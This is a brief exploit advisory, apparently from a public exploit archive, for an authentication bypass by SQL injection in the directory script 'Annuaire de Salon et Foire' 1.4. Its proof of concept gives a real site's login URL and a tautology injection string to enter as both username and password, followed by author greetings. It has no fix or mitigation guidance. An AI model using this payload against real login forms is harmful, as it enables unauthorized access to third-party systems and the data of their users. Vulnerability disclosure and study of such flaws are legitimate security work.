Annuaire de Salon et Foire version 1.4 suffers from authentication bypass due to a remote SQL injection vulnerability.
211270e8c5b25f157973aa76d5f87ef7631f0e04c60010dcfacb6b9acb263ebf
========================================================================
| # Title : Annuaire de Salon et Foire 1.4 / Bypass Authentication Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Français V.(Pro)
| # Vendor : http://www.vision-storm.com/
========================================================================
poc :
http://expointer.com/login.php
User : 1'or'1'='1
Pass : 1'or'1'='1
Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * Larry W. Cashdollar*
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be
---------------------------------------------------------------------------------------------------------------